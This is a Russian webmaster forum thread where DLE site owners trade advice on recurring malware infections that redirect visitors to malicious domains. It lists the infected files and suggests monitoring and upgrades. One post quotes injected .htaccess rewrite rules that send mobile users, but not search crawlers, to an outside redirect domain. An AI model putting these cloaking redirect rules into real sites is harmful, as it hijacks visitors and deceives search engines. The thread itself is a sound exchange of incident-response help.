- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
На трех сайтах обнаружил редиректы:
1 сайт googlanalytics.ws
2 сайт opgrade.ws
3 сайт dll-opera.ws
До этого на всех сайтах удалял такую фигню о которой говорится в ветке, но сейчас проходя по всем папкам .htaccess index.php и т.д. ничего не могу найти. Где это засело хз, поставил заглушки чтобы не подгружалось с аватарок. Может кто подскажет в где это искать?
1 сайт googlanalytics.ws
2 сайт opgrade.ws
3 сайт dll-opera.ws
До этого на всех сайтах удалял такую фигню о которой говорится в ветке, но сейчас проходя по всем папкам .htaccess index.php и т.д. ничего не могу найти. Где это засело хз, поставил заглушки чтобы не подгружалось с аватарок. Может кто подскажет в где это искать?
проверьте еще inc.php, init.php, search.php. мНЕ В эти файлы писали.
Поставьте ZEOS, меня он спасает просто. Поставила проверку файлов на изменения каждые 10 минут с уведомлением на электронку, кот. снимает смартфон.
ZEOS покажет какие файлы поменяли.
Скоро буду обновляться начистую до 9.8. Может хоть так удасться избавится от моего милого хакера. Патчи не помогают.
1 сайт googlanalytics.ws
2 сайт opgrade.ws
3 сайт dll-opera.ws
Ставьте 9.8, пока бог милует. Админку смените.
проверьте еще inc.php, init.php, search.php. мНЕ В эти файлы писали.
Поставьте ZEOS, меня он спасает просто. Поставила проверку файлов на изменения каждые 10 минут с уведомлением на электронку, кот. снимает смартфон.
ZEOS покажет какие файлы поменяли.
Скоро буду обновляться начистую до 9.8. Может хоть так удасться избавится от моего милого хакера. Патчи не помогают.
Спасибо, inc.php, init.php, search.php проверял не по одному разу. Эта зараза, где-то в другом месте засела.
3-й раз выдераю этот вирус ищите тут
config.php
dbconfig.php
engine.php - 2 раза прописан
init.php
index.php
и проверьте .htaccess там лишний код в области упоминания tags
Удачи!
От редиректа я избавился наверно с месяц назад, но яшка после этого как на прокаженного смотрит, хостов так на 25k скинул и возвращать позиции сайта я так понял не собирается, у кого нибудь такая ситуация с падением посещаемости присутствует после заражения сайта?
Тоже сегодня снова такая проблема вылезла. С месяц назад от всех кодов избавился, поменял все пароли, переименовал админки и все стало тихо, жил спокойно. Сегодня захожу и опять эта дрянь. Причем еще в новость iframe блок вставил, именно его антивирус спалил и поэтому так быстро все вычистил.
Еще ищите код в файле /language/Russian/website.lng в самом конце.
PS Кто возьмется найти эту дырку, стукните в ЛС плиз. По цене договоримся.
Пропатченная DLE 9.6
постоянно в корневом .htaccess появляется вот такая херня. Даже если ставлю права 0444, все равно появляется эта ерунда и права становятся 0664
RewriteCond %{HTTP_USER_AGENT} (symbos|windows\ mobile|smartphone|blackberry|ppc|midp|windows\ ce|mtk|j2me|symbian|series\ 60|android) [NC]
RewriteCond %{HTTP_USER_AGENT} !(ask\ jeeves|gamespy|googlebot|baidu|slurp|worldindexer|yandexaddurl|yandexnews|jigsaw|yandexmetrika|antabot|mmcrawler|gsa-crawler|yandexdirect|webalta|feedfetcher|yandexblogs|yandeximageresizer|accoona|yandexbot|yahoofeedseeker|grub-client|yandexmedia|ia_archiver|yandexvideo|yandexcatalog|gigabot|eltaindexer|gulper|mihalism|msnbot|ooyyo|pagebull|scooter|w3c_validator|yandeximages|yandexfavicons) [NC]
RewriteRule (.*) http://hy.gy/ [L,R=302]
Поменяйте права на запись этой папки где находиться htaccess и найдите шелл через который вам изменяют код.
старо..
заметил. если интересует - повреждения глубокие, - меняйте весь движок, - база не затронута в этот раз.